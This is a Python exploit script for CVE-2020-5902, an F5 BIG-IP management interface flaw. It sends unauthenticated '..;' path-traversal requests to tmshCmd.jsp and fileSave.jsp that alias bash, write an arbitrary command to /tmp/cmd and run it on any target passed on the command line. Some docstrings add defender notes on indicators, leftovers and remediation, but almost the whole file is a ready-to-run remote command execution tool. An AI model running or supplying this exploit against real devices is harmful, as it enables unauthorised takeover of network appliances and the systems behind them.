#!/usr/bin/env python3
import re,sys,argparse,requests,urllib3
from time import sleep
from datetime import datetime
from pprint import pprint
from threading import Thread, activeCount
# Silence urllib3's InsecureRequestWarning for the whole process. The requests
# in this script pass verify=False, so TLS certificates are not validated and
# the warning would otherwise be raised for those calls.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def getTime():
    """Return the current local wall-clock time as an ``HH:MM:SS`` string."""
    return datetime.now().strftime('%H:%M:%S')
def showInfo(message):
    """Print an informational line: a timestamp in ANSI colour, ``[*]``, then the message."""
    template = '[\033[1;94m{}\033[0;m] [*] {}'
    line = template.format(getTime(), message)
    print(line)
def showFail(message):
    """Print a failure line: a timestamp, a ``-`` marker and the message, all in ANSI colour."""
    template = '[\033[1;94m{}\033[0;m] [\033[1;91m-\033[0;m] \033[1;91m{}\033[0;m'
    line = template.format(getTime(), message)
    print(line)
def showSuccess(message):
    """Print a success line: a timestamp, a ``+`` marker and the message, all in ANSI colour."""
    template = '[\033[1;94m{}\033[0;m] [\033[1;92m+\033[0;m] \033[1;92m{}\033[0;m'
    line = template.format(getTime(), message)
    print(line)
def exit(message=None):
    """Report an optional message, wait for worker threads to finish, then exit.

    This function shadows the interactive ``exit`` builtin within this module.
    Despite the 'Killing all threads' text, no thread is terminated: the loop
    only polls until the main thread is the last one alive.

    Args:
        message: Text (or exception) printed through ``showFail`` before
            exiting; nothing is printed when it is ``None``.
    """
    try:
        if message is not None:
            showFail(message)
        threads_pending = activeCount() > 1
        if threads_pending:
            showInfo('Killing all threads')
        # Poll until every non-main thread has ended on its own.
        while activeCount() > 1:
            sleep(0.001)
        showInfo('Exiting script')
        sys.exit()
    except KeyboardInterrupt:
        # A Ctrl-C during the wait is swallowed; the function then returns
        # without calling sys.exit().
        pass
def rce(ip, port, cmd):
    """Send the four-request CVE-2020-5902 sequence to ip:port and print the third response.

    Every URL goes through ``/tmui/login.jsp/..;/`` to reach a workspace JSP
    (``tmshCmd.jsp`` or ``fileSave.jsp``), and no credentials are sent.  This
    is not a read-only check: the requests create a CLI alias, write
    ``/tmp/cmd`` and then delete the alias on the remote system.

    Defender notes: the request paths are the network indicator (``..;``
    inside a ``/tmui/`` path, followed by ``tmshCmd.jsp`` or
    ``fileSave.jsp``).  Host-side leftovers are ``/tmp/cmd``, which this
    function never removes, and the ``list`` alias when the run stops before
    the last request.  Remediation is the vendor fix for CVE-2020-5902 and
    keeping the management interface off untrusted networks.

    Args:
        ip: Host name or address placed in the URL.
        port: Port placed in the URL.
        cmd: Text written as the ``content`` of ``/tmp/cmd``.

    Returns:
        None.  The body of the third response is printed to stdout.
    """
    try:
        # 1: create the private alias, 2: write /tmp/cmd, 3: invoke it through
        # the alias, 4: delete the alias again.
        url1 = 'https://{}:{}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=create+cli+alias+private+list+command+bash'
        url2 = 'https://{}:{}/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/cmd&content={}'
        url3 = 'https://{}:{}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+/tmp/cmd'
        url4 = 'https://{}:{}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=delete+cli+alias+private+list'
        # verify=False turns off TLS certificate validation, so the identity of
        # the peer is not checked on any of these calls.
        requests.get(url1.format(ip, port), verify=False, timeout=5)
        requests.get(url2.format(ip, port, cmd), verify=False, timeout=5)
        r = requests.get(url3.format(ip, port), verify=False, timeout=5)
        # The HTTP status is never inspected; whatever body came back is
        # printed, so the output alone does not say whether the device is
        # affected.
        p = r.text
        print(p)
        # Alias cleanup only runs if the three requests above did not raise.
        requests.get(url4.format(ip, port), verify=False, timeout=5)
    except KeyboardInterrupt:
        exit('User aborted!')
    except Exception as e:
        # NOTE(review): any error (timeout, refused connection, DNS failure)
        # lands here and is reported as "not vulnerable".  That message is not
        # evidence that a device is patched.
        showFail('{} : {} is not vulnerable'.format(ip, port))
def main(args):
    """Run one ``rce`` call from parsed command-line arguments, then exit.

    Args:
        args: Parsed argparse namespace providing ``target``, ``port`` and
            ``cmd``.

    The closing 'Scan ended' message is passed to ``exit``, which prints it
    through ``showFail``.  Any ``Exception`` raised here is handed to ``exit``
    as its message.
    """
    try:
        showInfo('Starting scanning')
        target, port, command = args.target, args.port, args.cmd
        rce(target, port, command)
        # Wait until only the main thread is left before shutting down.
        while activeCount() > 1:
            sleep(0.001)
        exit('Scan ended')
    except Exception as err:
        exit(err)
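if __name__ == '__main__':
    try:
        # Declare an argparse variable to handle application command line arguments
        parser = argparse.ArgumentParser()
        parser.add_argument("-t", "--target", action="store", help="Target IP Address", required=True)
        parser.add_argument("-p", "--port", action="store", help="Target Port", default=443)
        parser.add_argument("-c", "--cmd", action="store", help="Command to execute", default="id")
        # Show the full help when no arguments are given. This must happen
        # before parse_args(): --target is required, so parse_args() would
        # exit with a usage error and the help branch would never be reached.
        if len(sys.argv[1:]) == 0:
            parser.print_help()
            parser.exit()
        args = parser.parse_args()
        main(args)
    except KeyboardInterrupt:
        exit('User aborted!')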